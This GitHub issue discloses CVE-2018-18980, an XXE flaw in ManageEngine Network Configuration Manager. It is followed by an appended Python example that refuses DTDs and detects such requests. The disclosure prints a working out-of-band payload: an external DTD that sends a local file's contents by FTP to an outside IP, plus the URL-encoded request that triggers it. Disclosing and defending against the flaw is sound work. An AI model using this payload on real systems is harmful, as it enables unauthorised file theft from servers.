
[CVE-2018-18980] Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability #5

Open
x-f1v3 opened this issue Oct 30, 2018 · 0 comments


x-f1v3 commented Oct 30, 2018

Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn

An XML External Entity injection (XXE) vulnerability
exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.

My VPS's evil.xml

<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY &#37; send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;


I used the FTP protocol to read the file; it can read the file c:\test.txt.

The test.txt is just for testing.

Then I used the PoC to request my VPS's evil.xml.

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>

The vulnerability exists in /devices/ProcessRequest.do?RequestID=463&RequestXML=, so I tested it with the PoC, which was URL-encoded.

http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E

On my VPS, I used a Python script to open the FTP protocol for accepting data.

When I sent the request, I received the content of test.txt on my VPS.
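As an added, defender-side example (not part of this issue and not ManageEngine's own code), here is a Python check of the kind a server-side handler or a log-review script would apply to the RequestXML parameter: it URL-decodes the value, refuses any DOCTYPE before the parser can define an entity such as %remote; or %file;, and flags request URLs shaped like the PoC above. The function and constant names and the benign sample request are assumptions made for this example; the PoC URL is the one quoted in the report.

```python
"""Added example (not from the advisory): reject DTDs in a RequestXML-style
parameter before parsing, and flag XXE-shaped requests in access logs."""
import re
import urllib.parse
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when the XML carries a DOCTYPE and so could declare entities."""


# Matches the constructs an XXE payload needs: a DTD or an entity declaration.
_DTD_MARKER = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Sample requests. POC_URL is the URL quoted in the report above; BENIGN_URL is
# a constructed, harmless request to the same endpoint (assumed, not observed).
_BASE = "http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML="
POC_XML_ENCODED = (
    "%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE"
    "%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178"
    "%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E"
)
POC_URL = _BASE + POC_XML_ENCODED
BENIGN_XML_ENCODED = "%3Croot%3E%3Cdevice%20id%3D%221%22%2F%3E%3C%2Froot%3E"
BENIGN_URL = _BASE + BENIGN_XML_ENCODED


def parse_request_xml(raw_param: str) -> str:
    """URL-decode the RequestXML value and parse it with DTD processing refused.

    Returns the root element name on success. Any DOCTYPE, with an internal or
    an external subset, aborts the parse, so no entity can ever be defined.
    """
    xml_text = urllib.parse.unquote(raw_param)
    parser = xml.parsers.expat.ParserCreate()
    # Belt and braces: never expand parameter entities even if a DTD appeared.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    root_name = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires at "<!DOCTYPE ...", before any <!ENTITY> inside it is processed.
        raise UnsafeXMLError("DOCTYPE not permitted in RequestXML")

    def on_start(name, attrs):
        if not root_name:
            root_name.append(name)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    # No ExternalEntityRefHandler is installed, so expat does not fetch
    # external entities; the DOCTYPE rejection above is the primary control.
    parser.Parse(xml_text, True)
    return root_name[0]


def rejects_dtd(raw_param: str) -> bool:
    """True if the hardened parser refused this RequestXML value."""
    try:
        parse_request_xml(raw_param)
    except UnsafeXMLError:
        return True
    return False


def is_xxe_shaped(url: str) -> bool:
    """Log-review check: does the RequestXML query parameter declare a DTD/entity?"""
    query = urllib.parse.urlsplit(url).query
    params = urllib.parse.parse_qs(query, keep_blank_values=True)  # URL-decodes values
    return any(_DTD_MARKER.search(value) for value in params.get("RequestXML", []))


if __name__ == "__main__":
    for label, url in (("poc", POC_URL), ("benign", BENIGN_URL)):
        print(label, "flagged" if is_xxe_shaped(url) else "clean")
    print("benign root:", parse_request_xml(BENIGN_XML_ENCODED))
    print("poc rejected:", rejects_dtd(POC_XML_ENCODED))
```

The log check and the parser are deliberately independent: the regex catches the request shape in access logs after the fact, while the DOCTYPE handler stops the parser before any entity declaration is processed, which is the same control (disallow DTDs) that a Java DocumentBuilderFactory would express with the disallow-doctype-decl feature.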

x-f1v3 changed the title "Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability" to "[CVE-2018-18980] Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability" on Nov 6, 2018